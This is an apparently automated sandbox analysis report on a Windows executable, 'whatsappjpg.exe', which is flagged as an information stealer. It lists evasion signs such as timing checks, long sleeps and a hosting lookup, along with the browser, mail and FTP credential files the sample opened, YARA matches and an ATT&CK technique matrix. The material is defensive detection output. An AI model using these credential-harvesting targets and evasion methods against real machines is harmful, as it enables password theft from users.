              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\whatsappjpg.exeAPI/Special instruction interceptor: Address: 656B830
              Source: C:\Users\user\Desktop\whatsappjpg.exeAPI/Special instruction interceptor: Address: 31FB830
              Source: C:\Users\user\Desktop\whatsappjpg.exeRDTSC instruction interceptor: First address: 6513551 second address: 6513551 instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2E7523A906h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test dl, bl 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\whatsappjpg.exeRDTSC instruction interceptor: First address: 31A3551 second address: 31A3551 instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2E752389A6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test dl, bl 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\whatsappjpg.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeMemory allocated: 36450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeMemory allocated: 36360000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597591Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597154Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596719Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594722Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594594Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeWindow / User API: threadDelayed 2329Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeWindow / User API: threadDelayed 7522Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\whatsappjpg.exeAPI coverage: 1.3 %
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 920Thread sleep count: 2329 > 30Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 920Thread sleep count: 7522 > 30Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598469s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -598031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597591s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597154s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -597047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596609s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596390s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -596062s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595843s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595625s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595515s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -594969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -594722s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716Thread sleep time: -594594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_0040276E FindFirstFileW,8_2_0040276E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405770
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_0040622B FindFirstFileW,FindClose,8_2_0040622B
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597591Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597154Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596719Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595953Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594722Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeThread delayed: delay time: 594594Jump to behavior
              Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\whatsappjpg.exeAPI call chain: ExitProcess graph end nodegraph_0-4486
              Source: C:\Users\user\Desktop\whatsappjpg.exeAPI call chain: ExitProcess graph end nodegraph_0-4491
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401752
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Users\user\Desktop\whatsappjpg.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              1
              Exfiltration Over Alternative Protocol
              1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts11
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              226
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              Security Account Manager411
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS141
              Virtualization/Sandbox Evasion
              Distributed Component Object Model1
              Clipboard Data
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets1
              Application Window Discovery
              SSHKeylogging22
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              whatsappjpg.exe8%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
